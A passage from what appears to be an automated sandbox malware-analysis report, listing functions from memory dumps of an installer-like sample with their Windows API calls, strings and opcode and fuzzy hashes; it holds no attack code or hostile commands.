                                                                                • Opcode Fuzzy Hash: 1de38f4d5ddaf67f585e838c093d206b1e6fac4d49fba3bd25f9ea225f581149
                                                                                • Instruction Fuzzy Hash: 67C1C174E00218CFEB54DFA9D980B9DBBB2BF88304F2081A9D409AB355DB759E85CF51
                                                                                Function 37840D60 Relevance: .3, Instructions: 268COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000083.00000002.42930118006.0000000037840000.00000040.00000800.00020000.00000000.sdmp, Offset: 37840000, based on PE: false
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 6957d5303b9e9b43688c272e95bb7a3f780b5121fe0b9555bf31dcbb063d4b95
                                                                                • Instruction ID: f95ce76e558c1dd8d3000f88f3ba22537808a289aa348229f93eadd8b940f6b9
                                                                                • Opcode Fuzzy Hash: 6957d5303b9e9b43688c272e95bb7a3f780b5121fe0b9555bf31dcbb063d4b95
                                                                                • Instruction Fuzzy Hash: 59C1A174E00218CFDB54DFA5D984B9DBBB2BF89304F2081AAD809A7365DB355E85CF50
                                                                                Function 378404A0 Relevance: .3, Instructions: 268COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000083.00000002.42930118006.0000000037840000.00000040.00000800.00020000.00000000.sdmp, Offset: 37840000, based on PE: false
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: d8f521c8521bdb25542d02bd3972698c22e96887a35c43e5287817e0d1365036
                                                                                • Instruction ID: af27170005db6e81cebc738908b1480b20cc8350b79a298330ed75e94db52c28
                                                                                • Opcode Fuzzy Hash: d8f521c8521bdb25542d02bd3972698c22e96887a35c43e5287817e0d1365036
                                                                                • Instruction Fuzzy Hash: 08C1A074E00218CFDB54DFA5D984B9DBBB2BF89304F2081A9D809A7365DB359E86CF50
                                                                                Function 37840040 Relevance: .3, Instructions: 268COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000083.00000002.42930118006.0000000037840000.00000040.00000800.00020000.00000000.sdmp, Offset: 37840000, based on PE: false
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 196f924dfcc596c67d812e53bb761a4475d18f668b19af3bd05c30ebe65346c1
                                                                                • Instruction ID: 0acc3d2639ac64241002e65ab5318dcdd0dcfa17b5d32e449b49b69ae9cf232c
                                                                                • Opcode Fuzzy Hash: 196f924dfcc596c67d812e53bb761a4475d18f668b19af3bd05c30ebe65346c1
                                                                                • Instruction Fuzzy Hash: 3BC1B274E00218CFDB54DFA5D984B9DBBB2BF89304F2081AAD809AB365DB355E85CF50
                                                                                Function 37B95F18 Relevance: .2, Instructions: 222COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000083.00000002.42930382268.0000000037B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 37B90000, based on PE: false
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: aa8e82ed73c4607f740a69ea02007d2de788b24f294528c8e45ec4a5bdcf68cc
                                                                                • Instruction ID: 38bd05118a8bcd86426c3647b2d3446ac2ffab66c89e5c851ae7c7ba2871bbf3
                                                                                • Opcode Fuzzy Hash: aa8e82ed73c4607f740a69ea02007d2de788b24f294528c8e45ec4a5bdcf68cc
                                                                                • Instruction Fuzzy Hash: 06B1A874E10618CFDB54DFA9D884A9DBBB2FF89310F1181A9D819AB365DB34AD42CF40
                                                                                Function 0016EB63 Relevance: .2, Instructions: 193COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000083.00000002.42908773760.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 313e560dacddc8e92a2ae2a41815ce385699cd055fcda9f38b8e5afa150f9e08
                                                                                • Instruction ID: fe9fde817b95e4a518cf4e3c141b23be108385cb2f70768c4c35c5c1862df804
                                                                                • Opcode Fuzzy Hash: 313e560dacddc8e92a2ae2a41815ce385699cd055fcda9f38b8e5afa150f9e08
                                                                                • Instruction Fuzzy Hash: 52A16D74A01228CFDB64DF64D994BD9BBB2BF49301F1085EAD409A7350DB359E81CF51
                                                                                Function 37B95F15 Relevance: .1, Instructions: 126COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000083.00000002.42930382268.0000000037B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 37B90000, based on PE: false
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 1a6130eaecd9769d87ea02717b30171c49694f4b4a2ab27892070223e70d2f3b
                                                                                • Instruction ID: d3215b7f7918a858cb1f3823ec47ebac39a745da30d913b2708acb6c1c70683e
                                                                                • Opcode Fuzzy Hash: 1a6130eaecd9769d87ea02717b30171c49694f4b4a2ab27892070223e70d2f3b
                                                                                • Instruction Fuzzy Hash: 85515274E10608CFDB48DFAAD984ADDBBF2BF89300F248169D419AB365DB349942CF54
                                                                                Function 0016ED44 Relevance: .1, Instructions: 116COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000083.00000002.42908773760.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: addecfd5ff0b899c6379a877e5ffd016950bb108d7c2884ceb3ee7fa6340e90b
                                                                                • Instruction ID: 4f2448b2dd61198f99c17a6858ba9acdf1f53baa312f61005f9a5862fde9b8d8
                                                                                • Opcode Fuzzy Hash: addecfd5ff0b899c6379a877e5ffd016950bb108d7c2884ceb3ee7fa6340e90b
                                                                                • Instruction Fuzzy Hash: 96519074A01229CFCB64DF64DC54BAAB7B2BF4A301F6095E9D40AA7350DB359E81CF50
                                                                                Function 3784DEB0 Relevance: .1, Instructions: 97COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000083.00000002.42930118006.0000000037840000.00000040.00000800.00020000.00000000.sdmp, Offset: 37840000, based on PE: false
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: cc9cb3da0c135bb8254ac47fe0ed293625860fb1a7251e81da6e72f9d3bedcd4
                                                                                • Instruction ID: 9862c3f726ecaaf41d7f67122304ab54c5ef47b239c7df89c26c2c05bd373b30
                                                                                • Opcode Fuzzy Hash: cc9cb3da0c135bb8254ac47fe0ed293625860fb1a7251e81da6e72f9d3bedcd4
                                                                                • Instruction Fuzzy Hash: FB41ECB4D122099FCB00CFA8C594BEEBBF1AF4A304F5494A9E404B7390D7799A40CF94
                                                                                Function 004051BA Relevance: 54.3, APIs: 36, Instructions: 282windowclipboardmemoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetDlgItem.USER32(?,00000403), ref: 00405219
                                                                                • GetDlgItem.USER32(?,000003EE), ref: 00405228
                                                                                • GetClientRect.USER32(?,?), ref: 00405265
                                                                                • GetSystemMetrics.USER32(00000002), ref: 0040526C
                                                                                • SendMessageA.USER32(?,0000101B,00000000,?), ref: 0040528D
                                                                                • SendMessageA.USER32(?,00001036,00004000,00004000), ref: 0040529E
                                                                                • SendMessageA.USER32(?,00001001,00000000,?), ref: 004052B1
                                                                                • SendMessageA.USER32(?,00001026,00000000,?), ref: 004052BF
                                                                                • SendMessageA.USER32(?,00001024,00000000,?), ref: 004052D2
                                                                                • ShowWindow.USER32(00000000,?,0000001B,?), ref: 004052F4
                                                                                • ShowWindow.USER32(?,00000008), ref: 00405308
                                                                                • GetDlgItem.USER32(?,000003EC), ref: 00405329
                                                                                • SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 00405339
                                                                                • SendMessageA.USER32(00000000,00000409,00000000,?), ref: 00405352
                                                                                • SendMessageA.USER32(00000000,00002001,00000000,?), ref: 0040535E
                                                                                • GetDlgItem.USER32(?,000003F8), ref: 00405237
                                                                                  • Part of subcall function 0040407D: SendMessageA.USER32(00000028,?,00000001,00403EAE), ref: 0040408B
                                                                                • GetDlgItem.USER32(?,000003EC), ref: 0040537A
                                                                                • CreateThread.KERNEL32(00000000,00000000,Function_0000514E,00000000), ref: 00405388
                                                                                • CloseHandle.KERNEL32(00000000), ref: 0040538F
                                                                                • ShowWindow.USER32(00000000), ref: 004053B2
                                                                                • ShowWindow.USER32(?,00000008), ref: 004053B9
                                                                                • ShowWindow.USER32(00000008), ref: 004053FF
                                                                                • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405433
                                                                                • CreatePopupMenu.USER32 ref: 00405444
                                                                                • AppendMenuA.USER32(00000000,00000000,00000001,00000000), ref: 00405459
                                                                                • GetWindowRect.USER32(?,000000FF), ref: 00405479
                                                                                • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405492
                                                                                • SendMessageA.USER32(?,0000102D,00000000,?), ref: 004054CE
                                                                                • OpenClipboard.USER32(00000000), ref: 004054DE
                                                                                • EmptyClipboard.USER32 ref: 004054E4
                                                                                • GlobalAlloc.KERNEL32(00000042,?), ref: 004054ED
                                                                                • GlobalLock.KERNEL32(00000000), ref: 004054F7
                                                                                • SendMessageA.USER32(?,0000102D,00000000,?), ref: 0040550B
                                                                                • GlobalUnlock.KERNEL32(00000000), ref: 00405524
                                                                                • SetClipboardData.USER32(00000001,00000000), ref: 0040552F
                                                                                • CloseClipboard.USER32 ref: 00405535
                                                                                Memory Dump Source
                                                                                • Source File: 00000083.00000002.42908945970.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000083.00000002.42908922675.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000083.00000002.42908974501.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000083.00000002.42909002223.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000083.00000002.42909028951.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Similarity
                                                                                • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                                • String ID:
                                                                                • API String ID: 590372296-0
                                                                                • Opcode ID: 9df3a087d96cf4237faaa0f67ed8b6455cffabaa321fafc2e2959f76e593155d
                                                                                • Instruction ID: 7964bf5c578b3de76ace8e2c28f1261f98ad7804c3e0f9b8393b3024568df2d6
                                                                                • Opcode Fuzzy Hash: 9df3a087d96cf4237faaa0f67ed8b6455cffabaa321fafc2e2959f76e593155d
                                                                                • Instruction Fuzzy Hash: 64A148B1900208BFDB119FA0DD89EAE7B79FB08355F00403AFA04B61A0C7B55E51DF69
                                                                                Function 00403B75 Relevance: 48.3, APIs: 32, Instructions: 345windowstringCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403BB1
                                                                                • ShowWindow.USER32(?), ref: 00403BCE
                                                                                • DestroyWindow.USER32 ref: 00403BE2
                                                                                • SetWindowLongA.USER32(?,00000000,00000000), ref: 00403BFE
                                                                                • GetDlgItem.USER32(?,?), ref: 00403C1F
                                                                                • SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 00403C33
                                                                                • IsWindowEnabled.USER32(00000000), ref: 00403C3A
                                                                                • GetDlgItem.USER32(?,00000001), ref: 00403CE8
                                                                                • GetDlgItem.USER32(?,00000002), ref: 00403CF2
                                                                                • SetClassLongA.USER32(?,000000F2,?), ref: 00403D0C
                                                                                • SendMessageA.USER32(0000040F,00000000,00000001,?), ref: 00403D5D
                                                                                • GetDlgItem.USER32(?,00000003), ref: 00403E03
                                                                                • ShowWindow.USER32(00000000,?), ref: 00403E24
                                                                                • EnableWindow.USER32(?,?), ref: 00403E36
                                                                                • EnableWindow.USER32(?,?), ref: 00403E51
                                                                                • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403E67
                                                                                • EnableMenuItem.USER32(00000000), ref: 00403E6E
                                                                                • SendMessageA.USER32(?,000000F4,00000000,00000001), ref: 00403E86
                                                                                • SendMessageA.USER32(?,00000401,00000002,00000000), ref: 00403E99
                                                                                • lstrlenA.KERNEL32(0041FD30,?,0041FD30,00422F20), ref: 00403EC2
                                                                                • SetWindowTextA.USER32(?,0041FD30), ref: 00403ED1
                                                                                • ShowWindow.USER32(?,0000000A), ref: 00404005
                                                                                Memory Dump Source
                                                                                • Source File: 00000083.00000002.42908945970.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000083.00000002.42908922675.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000083.00000002.42908974501.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000083.00000002.42909002223.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000083.00000002.42909028951.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Similarity
                                                                                • API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
                                                                                • String ID:
                                                                                • API String ID: 184305955-0
                                                                                • Opcode ID: da28513e2224feb1c808745cddd981e43446dbc6f8a7ab03dd6565fed6e5aadb
                                                                                • Instruction ID: c8c4f9f6fa32ab432123c95edc0b9dc077676c0f3e6a7dc1ab02adf3a8b3c805
                                                                                • Opcode Fuzzy Hash: da28513e2224feb1c808745cddd981e43446dbc6f8a7ab03dd6565fed6e5aadb
                                                                                • Instruction Fuzzy Hash: 54C1D3B1A04205BBDB206F61ED89D2B3A78FB85306F51443EF611B11F1C779A942AB1E
                                                                                Function 00404191 Relevance: 40.5, APIs: 20, Strings: 3, Instructions: 205windowstringCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • CheckDlgButton.USER32(00000000,-0000040A,00000001), ref: 0040421C
                                                                                • GetDlgItem.USER32(00000000,000003E8), ref: 00404230
                                                                                • SendMessageA.USER32(00000000,0000045B,00000001,00000000), ref: 0040424E
                                                                                • GetSysColor.USER32(?), ref: 0040425F
                                                                                • SendMessageA.USER32(00000000,00000443,00000000,?), ref: 0040426E
                                                                                • SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 0040427D
                                                                                • lstrlenA.KERNEL32(?), ref: 00404280
                                                                                • SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 0040428F
                                                                                • SendMessageA.USER32(00000000,00000449,?,00000110), ref: 004042A4
                                                                                • GetDlgItem.USER32(?,0000040A), ref: 00404306
                                                                                • SendMessageA.USER32(00000000), ref: 00404309
                                                                                • GetDlgItem.USER32(?,000003E8), ref: 00404334
                                                                                • SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 00404374
                                                                                • LoadCursorA.USER32(00000000,00007F02), ref: 00404383
                                                                                • SetCursor.USER32(00000000), ref: 0040438C
                                                                                • ShellExecuteA.SHELL32(0000070B,open,004226C0,00000000,00000000,00000001), ref: 0040439F
                                                                                • LoadCursorA.USER32(00000000,00007F00), ref: 004043AC
                                                                                • SetCursor.USER32(00000000), ref: 004043AF
                                                                                • SendMessageA.USER32(00000111,00000001,00000000), ref: 004043DB
                                                                                • SendMessageA.USER32(00000010,00000000,00000000), ref: 004043EF
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000083.00000002.42908945970.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000083.00000002.42908922675.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000083.00000002.42908974501.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000083.00000002.42909002223.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000083.00000002.42909028951.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Similarity
                                                                                • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                                                                                • String ID: N$\A@$open
                                                                                • API String ID: 3615053054-3795635102
                                                                                • Opcode ID: 0d3f312fefaf2c190e171dfa2e1175f61d5d84c52849205d92d9bfd162526d75
                                                                                • Instruction ID: aa20bcc63d66581fa7bbac4c1809bf2e03719b1a0f02ef32c38fc7c0d03722a0
                                                                                • Opcode Fuzzy Hash: 0d3f312fefaf2c190e171dfa2e1175f61d5d84c52849205d92d9bfd162526d75
                                                                                • Instruction Fuzzy Hash: 3D6191B1A40209BBEF109F61DC45F6A7B69FB84714F108036FB01BA2D1C7B8A951CF98
                                                                                Function 004037E3 Relevance: 37.0, APIs: 13, Strings: 8, Instructions: 215stringregistryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 004061FC: GetModuleHandleA.KERNEL32(?,?,?,00403295,00000009), ref: 0040620E
                                                                                  • Part of subcall function 004061FC: GetProcAddress.KERNEL32(00000000,?), ref: 00406229
                                                                                • lstrcatA.KERNEL32(0042A000,0041FD30,80000001,Control Panel\Desktop\ResourceLocale,00000000,0041FD30,00000000,00000002,75DF3410,0042A400,00429000,00000000), ref: 0040385E
                                                                                • lstrlenA.KERNEL32(004226C0,?,?,?,004226C0,00000000,00429400,0042A000,0041FD30,80000001,Control Panel\Desktop\ResourceLocale,00000000,0041FD30,00000000,00000002,75DF3410), ref: 004038D3
                                                                                • lstrcmpiA.KERNEL32(?,.exe), ref: 004038E6
                                                                                • GetFileAttributesA.KERNEL32(004226C0), ref: 004038F1
                                                                                • LoadImageA.USER32(00000067,00000001,00000000,00000000,00008040,00429400), ref: 0040393A
                                                                                  • Part of subcall function 00405DC1: wsprintfA.USER32 ref: 00405DCE
                                                                                • RegisterClassA.USER32(00422EC0), ref: 00403977
                                                                                • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 0040398F
                                                                                • CreateWindowExA.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 004039C4
                                                                                • ShowWindow.USER32(00000005,00000000), ref: 004039FA
                                                                                • GetClassInfoA.USER32(00000000,RichEdit20A,00422EC0), ref: 00403A26
                                                                                • GetClassInfoA.USER32(00000000,RichEdit,00422EC0), ref: 00403A33
                                                                                • RegisterClassA.USER32(00422EC0), ref: 00403A3C
                                                                                • DialogBoxParamA.USER32(?,00000000,00403B75,00000000), ref: 00403A5B
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000083.00000002.42908945970.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000083.00000002.42908922675.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000083.00000002.42908974501.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000083.00000002.42909002223.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000083.00000002.42909028951.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Similarity
                                                                                • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                                • String ID: .DEFAULT\Control Panel\International$.exe$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
                                                                                • API String ID: 1975747703-2904746566
                                                                                • Opcode ID: 1d56fba69deda3eace6a01f267842d5a1cdb9e44690bccd690864acbbeb733b9
                                                                                • Instruction ID: 6c8974e4dfdcf182ca6d095a6101ff5518a0df20e425d3d5ae506d2571b44078
                                                                                • Opcode Fuzzy Hash: 1d56fba69deda3eace6a01f267842d5a1cdb9e44690bccd690864acbbeb733b9
                                                                                • Instruction Fuzzy Hash: 076191B17442007ED620AF659D45F2B3AACEB8475AF40447FF941B22E2C7BC9D029A7D
                                                                                Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
                                                                                • BeginPaint.USER32(?,?), ref: 00401047
                                                                                • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                                • DeleteObject.GDI32(?), ref: 004010ED
                                                                                • CreateFontIndirectA.GDI32(?), ref: 00401105
                                                                                • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                                • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                                • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                • DrawTextA.USER32(00000000,00422F20,000000FF,00000010,00000820), ref: 00401156
                                                                                • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                • DeleteObject.GDI32(?), ref: 00401165
                                                                                • EndPaint.USER32(?,?), ref: 0040116E
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000083.00000002.42908945970.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000083.00000002.42908922675.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000083.00000002.42908974501.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000083.00000002.42909002223.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000083.00000002.42909028951.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Similarity
                                                                                • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                • String ID: F
                                                                                • API String ID: 941294808-1304234792
                                                                                • Opcode ID: 7c104425433eee9aa72c8594e5c9845c7e8c7dbb4814f5ad4226ea4ba1dd0cf1
                                                                                • Instruction ID: f6076547c65416f673289c9e9aa760257b54fe90aa12de16c0a46004740ece36
                                                                                • Opcode Fuzzy Hash: 7c104425433eee9aa72c8594e5c9845c7e8c7dbb4814f5ad4226ea4ba1dd0cf1
                                                                                • Instruction Fuzzy Hash: C2419B71804249AFCF058FA4CD459AFBBB9FF45310F00812AF961AA1A0C738EA50DFA5
                                                                                Function 00405BAC Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 131stringmemoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • lstrcpyA.KERNEL32(00421AC0,NUL,?,00000000,?,00000000,00405D3F,?,?), ref: 00405BBB
                                                                                • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,00405D3F,?,?), ref: 00405BDF
                                                                                • GetShortPathNameA.KERNEL32(?,00421AC0,00000400), ref: 00405BE8
                                                                                  • Part of subcall function 00405A3B: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405C98,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405A4B
                                                                                  • Part of subcall function 00405A3B: lstrlenA.KERNEL32(00000000,?,00000000,00405C98,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405A7D
                                                                                • GetShortPathNameA.KERNEL32(00421EC0,00421EC0,00000400), ref: 00405C05
                                                                                • wsprintfA.USER32 ref: 00405C23
                                                                                • GetFileSize.KERNEL32(00000000,00000000,00421EC0,C0000000,00000004,00421EC0,?,?,?,?,?), ref: 00405C5E
                                                                                • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405C6D
                                                                                • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405CA5
                                                                                • SetFilePointer.KERNEL32(004093C8,00000000,00000000,00000000,00000000,004216C0,00000000,-0000000A,004093C8,00000000,[Rename],00000000,00000000,00000000), ref: 00405CFB
                                                                                • GlobalFree.KERNEL32(00000000), ref: 00405D0C
                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00405D13
                                                                                  • Part of subcall function 00405AD6: GetFileAttributesA.KERNEL32(00000003,00402CF9,0042AC00,80000000,00000003), ref: 00405ADA
                                                                                  • Part of subcall function 00405AD6: CreateFileA.KERNEL32(?,?,00000001,00000000,?,00000001,00000000), ref: 00405AFC
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000083.00000002.42908945970.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000083.00000002.42908922675.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000083.00000002.42908974501.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000083.00000002.42909002223.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000083.00000002.42909028951.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Similarity
                                                                                • API ID: File$CloseGlobalHandleNamePathShortlstrcpylstrlen$AllocAttributesCreateFreePointerSizewsprintf
                                                                                • String ID: %s=%s$NUL$[Rename]
                                                                                • API String ID: 222337774-4148678300
                                                                                • Opcode ID: 2e3f1d5478f9f0c6b3014663fcb7d6cbfaa562a2a519d3499902ae05c7337469
                                                                                • Instruction ID: f02436ff356463cbad731f06bd7f36315381bbfe77d8bed81a3cf794d1fe08c5
                                                                                • Opcode Fuzzy Hash: 2e3f1d5478f9f0c6b3014663fcb7d6cbfaa562a2a519d3499902ae05c7337469
                                                                                • Instruction Fuzzy Hash: 2231C274604B597BD2207B615D49F6B3A9CEF45758F24013BF905B22D2DA78AC008EBD
                                                                                Function 00404486 Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 274stringCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetDlgItem.USER32(?,000003FB), ref: 004044D5
                                                                                • SetWindowTextA.USER32(00000000,?), ref: 004044FF
                                                                                • SHBrowseForFolderA.SHELL32(?,0041F108,?), ref: 004045B0
                                                                                • CoTaskMemFree.OLE32(00000000), ref: 004045BB
                                                                                • lstrcmpiA.KERNEL32(004226C0,0041FD30), ref: 004045ED
                                                                                • lstrcatA.KERNEL32(?,004226C0), ref: 004045F9
                                                                                • SetDlgItemTextA.USER32(?,000003FB,?), ref: 0040460B
                                                                                  • Part of subcall function 0040563D: GetDlgItemTextA.USER32(?,?,00000400,00404642), ref: 00405650
                                                                                  • Part of subcall function 004060CE: CharNextA.USER32(?,*?|<>/":,00000000,00429000,75DF3410,0042A400,00000000,00403206,0042A400,0042A400,0040341B), ref: 00406126
                                                                                  • Part of subcall function 004060CE: CharNextA.USER32(?,?,?,00000000), ref: 00406133
                                                                                  • Part of subcall function 004060CE: CharNextA.USER32(?,00429000,75DF3410,0042A400,00000000,00403206,0042A400,0042A400,0040341B), ref: 00406138
                                                                                  • Part of subcall function 004060CE: CharPrevA.USER32(?,?,75DF3410,0042A400,00000000,00403206,0042A400,0042A400,0040341B), ref: 00406148
                                                                                • GetDiskFreeSpaceA.KERNEL32(0041ED00,?,?,0000040F,?,0041ED00,0041ED00,?,00000001,0041ED00,?,?,000003FB,?), ref: 004046C9
                                                                                • MulDiv.KERNEL32(?,0000040F,00000400), ref: 004046E4
                                                                                  • Part of subcall function 0040483D: lstrlenA.KERNEL32(0041FD30,0041FD30,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404758,000000DF,00000000,00000400,?), ref: 004048DB
                                                                                  • Part of subcall function 0040483D: wsprintfA.USER32 ref: 004048E3
                                                                                  • Part of subcall function 0040483D: SetDlgItemTextA.USER32(?,0041FD30), ref: 004048F6
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000083.00000002.42908945970.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000083.00000002.42908922675.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000083.00000002.42908974501.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000083.00000002.42909002223.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000083.00000002.42909028951.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Similarity
                                                                                • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                                • String ID: A
                                                                                • API String ID: 2624150263-3554254475
                                                                                • Opcode ID: 555b0d8a2605e6a55d78fcd569647acd639b7896ddbd0d3dcd57faa20299248c
                                                                                • Instruction ID: 175f10717e4f371f028a94a7e43d857af948bb7b3e906aba32508f1788989df3
                                                                                • Opcode Fuzzy Hash: 555b0d8a2605e6a55d78fcd569647acd639b7896ddbd0d3dcd57faa20299248c
                                                                                • Instruction Fuzzy Hash: 27A18FF1900209ABDB11AFA5CC45AAFB7B8EF85314F14843BF601B72D1D77C9A418B69
                                                                                Function 00402CB6 Relevance: 19.5, APIs: 5, Strings: 6, Instructions: 203memoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetTickCount.KERNEL32 ref: 00402CCA
                                                                                • GetModuleFileNameA.KERNEL32(00000000,0042AC00,00000400), ref: 00402CE6
